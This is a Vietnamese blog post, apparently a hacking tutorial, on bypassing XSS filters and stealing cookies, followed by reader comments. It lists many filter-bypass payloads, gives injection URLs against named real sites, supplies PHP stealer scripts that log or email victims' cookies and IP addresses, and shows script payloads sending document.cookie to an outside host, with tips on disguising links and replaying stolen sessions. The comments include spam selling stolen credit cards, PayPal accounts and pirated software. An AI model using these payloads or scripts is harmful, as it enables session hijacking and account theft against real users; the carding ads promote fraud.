Trong bài trước Giới thiệu chung về XSS Soleil đã giới thiệu qua về cách kiểm tra, xác định 1 site dính XSS và một số thao thác thực thi trên sites bị dính lỗi . Trong bài này Soleil sẽ đề cập đến các kỹ thuật bypass và quá trình thực hiện 1 cuốc tấn công bằng XSS
7. Kỹ Thuật Bypass
1
số site dính XSS không thể tấn công bằng những đoạn mã đơn giản, giải pháp nghĩ
đến đó là phải bypass bộ lọc. Có một số dạng bypass đoạn mã script như sau:
"><script>alert("Check By Soleil")</script>
"><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) </script>
'><script>alert("Check By Soleil ")</script>
'><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
<ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</ScRIPt>
"><ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) </ScRIPt>
'><ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</ScRIPt>
</script><script>alert("Check By Soleil ")</script>
</script><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108) )</script>
"/><script>alert("Check By Soleil ")</script>
"/><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
'/><script>alert("Check By Soleil ")</script>
'/><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
</SCRIPT>"><SCRIPT>alert("Check By Soleil ")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))
</SCRIPT>">"><SCRIPT>alert("Check By Soleil ")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</SCRIPT>
</SCRIPT>">'<SCRIPT>alert(String.fromCharCode(67,104,101,99,107,32,66,121,32,83,111,108,101,105,108,45,86,72,66,32,89,104,58,100,117,99,100,117,110,103,46,48,56,99,108,99 ))</SCRIPT>
";alert("Check By Soleil ");"
";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));"
';alert("Check By Soleil ");'
';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));'
";alert("Check By Soleil ")
";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) ';alert("Check By Soleil ")
';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))
Trong đó: 67, 104, 101, 99, 107,
32, 66, 121, 32, 83, 111, 108, 101, 105, 108 chính là chuỗi string “ Check By
Soleil” ở dạng char.
Ví dụ:
-
Attacker có thể chèn vào thanh tìm kiếm
site http://www.hanoi.gov.vn đoạn
mã script đã bypass sau:
<SCRIPT>alert(String.fromCharCode(67,104,101,99,107,32,66,121,32,83,111,108,101,105,108,45,86,72,66,32,89,104,58,100,117,99,100,117,110,103,46,48,56,99,108,99 ))</SCRIPT>Từ đó xác định site này đã chính lỗ hổng XSS và sẽ tìm cách để khai thác, chiếm quyền điều khiển đối với site này.
- http://m.aol.com/yp/search?query=Bars"><script>alert(/Check By Mr.Soleil VHB_Group/)</script>
http://tuoitre.vn/Tim-kiem/?page=1&keyword=%3C/script%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2867,104,101,99,107,32,66,121,32,83,111,108,101,105,108,45,86,72,66,32,89,104,58,100,117,99,100,117,110,103,46,48,56,99,108,99%20%29%29%3C/SCRIPT%3E
8. Quá trình các bước thực hiện tấn
công bằng XSS
Bước 1: Tạo file Stealer.php để đánh cắp cookies
Nội dung của
file Stealer.php như sau:
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("logs.txt", "a");
fwrite($steal, $cookie ."\\n");
fclose($steal);
?>- $cookie = $HTTP_GET_VARS["cookie"]; // đánh cắp cookie từ địa chỉ hiện tại url(stealer.php?cookie=x) và lưu trữ cookie trong biến $cookie- $steal = fopen("cookiefile.txt", "a"); // Mở cookiefile để đính kèm các cookie được đánh cắp- fwrite($steal, $cookie ."\\n"); // Lưu lại những cookie được đánh cắp bên trong file- fclose($steal); // Đóng lại cookiefile
File này có nhiệm vụ đánh cắp
cookies của victim và ghi thông tin lên file logs.txt
Bước 2: Up các file lên host
UP lên host 2
file Stealer.php và logs.txt. Trong đó file Stealer.php có nội dung như trên và
file logs.txt là file rỗng để lưu trữ toàn bộ thông tin của victim được gửi về
thông qua mệnh lệnh được đưa ra từ file Stealer.php.
Lưu ý, phải chmod file
log.txt về 777.
Ngoài ra có thể sử dụng các đoạn
mã sau có thêm nhiều nhiệm vụ hơn cho
file stealer.php
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: <ENTER WEBSITE HERE>");
?><?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?><?php
$cookie = $HTTP_GET_VARS["cookie"];mail("ducdung.08clc@gmail.com", "Stolen Cookies", $cookie);?>// Đoạn mã này có tác dụng gửi cookies về email của attacker
Bước 3: Khai thác lỗ hổng XSS
-
Giả sử soleil up 2 file trên lên host của site http://www.vhbgroup.net , thì
đoạn mã script ăn cắp cookies có dạng như sau:
<script>location.href = 'http://www.vhbgroup.net/Stealer.php?cookie='+document.cookie;</script>
http://www.VulnerableSite.com/index.php?search=<script>location.href='http://www.vhbgroup.net/Stealer.php?cookie='+document.cookie;</script>
-
Hoặc là chèn đoạn mã sau vào khung search,
comment hay textbox nào đó, khi victim view site thì cookies sẽ được gửi về cho
attacker <script>location.href='http://www.vhbgroup.net/Stealer.php?cookie='+document.cookie;</script>
Để đánh lừa được victim thì
attacker sẽ làm ngắn đoạn url trên bằng cách sử dụng 1 số link sau:
https://addons.mozilla.org/vi/firefox/addon/copy-shorturl/
Sau khi đã đánh cắp đươc thông
tin cookies của victim, có thể sử dụng tiên ích add-ons cookies manager hoặc live http để login.
6 nhận xét:
Dork XSS: http://www.ziddu.com/download/16913106/XSSDorks.txt.html
http://google.nyu.edu/search?q=%22%3E%3Cscript%3Ealert%28%22Check+By+Mr.Soleil+VHB_Group%22%29%3C%2Fscript%3E+&btnG=Search&site=NYUWeb_Main&client=NYUWeb_Main&output=xml_no_dtd&proxyreload=1&proxystylesheet=stern_frontend&sitesearch=www.stern.nyu.edu&ie=UTF-8&sort=date%3AD%3AL%3Ad1&entqr=0&entqrm=0&entsp=a__NYUWeb_Main_bias_policy&oe=UTF-8&ud=1
thanks bạn rất nhiều
truyen sex | phim sex | truyen nguoi lon | truyen sex moi | phim sex moi | phim | xem phim | phim sex
Làm sao để up 2 file trên lên host một web?
hay lam anh
Bán CC, Gift Card, Stock 5, Ship, Ads Facebook,Key phần mềm
==== Credit Card ====
- Us (Visa,Master) = 5$ per 1 ( >100cc = 1$/CC)
- Us (Amex,Dis) = 7$ per 1 ( >100cc = 2$/CC)
CC is Checked, nếu cc bị die bảo hành 1 - 1 trong vòng 24h kể từ lúc bạn payment
Tặng 1 Stock US cho bạn nào mua CC
==== Gift Card ====
Selling Amazon Gift Card all balancer (35%)
Selling ITunes Gift Card (45%)
Seliing Ebay , Mayc , BestBuy , Newget Egift Card (40%)
==== Paypal ====
Paypal Veritified with balance 3000$ = 300$
Paypal Veritified with balance 5000$ = 500$
Paypal Veritified with balance 7000$ = 800$
Paypal Veritified with balance 15000$= 1000$
==== Stock v5 ====
- Stock Live US,UK,CA,AU,EU,... 20$/100 days
==== Account Google Drive Unlimited
- 50$/account/10 năm
==== Key Phần mềm, bản quyền, lech file envato, acc vip,...
Liên hệ để có giá chi tiết
Lech file evato product design,Kis,Windows 10/7/8, IDM,..
==== Shipped, Drop, Direct. Ship Iphone, ipad, ebay và amzon
Ship direct (trực tiếp) Viet Nam 2-3 ngày có tracking number (35%)
Ship + Drop 3 - 7 ngày có tracking EMS (60%)
==== TUT Run ADS FACEBOOK With CVV ====
Chạy quảng cáo ads facebook chùa (Free) - Không block page
**View more: http://notepad.cc/share/N7zCviwrIM
===> Contact tôi (24/7) <===
Yahoo: HKT.KT823@Yahoo.com
Gmail: HKT.KT8@gmail.com
ICQ: 651262920
Đăng nhận xét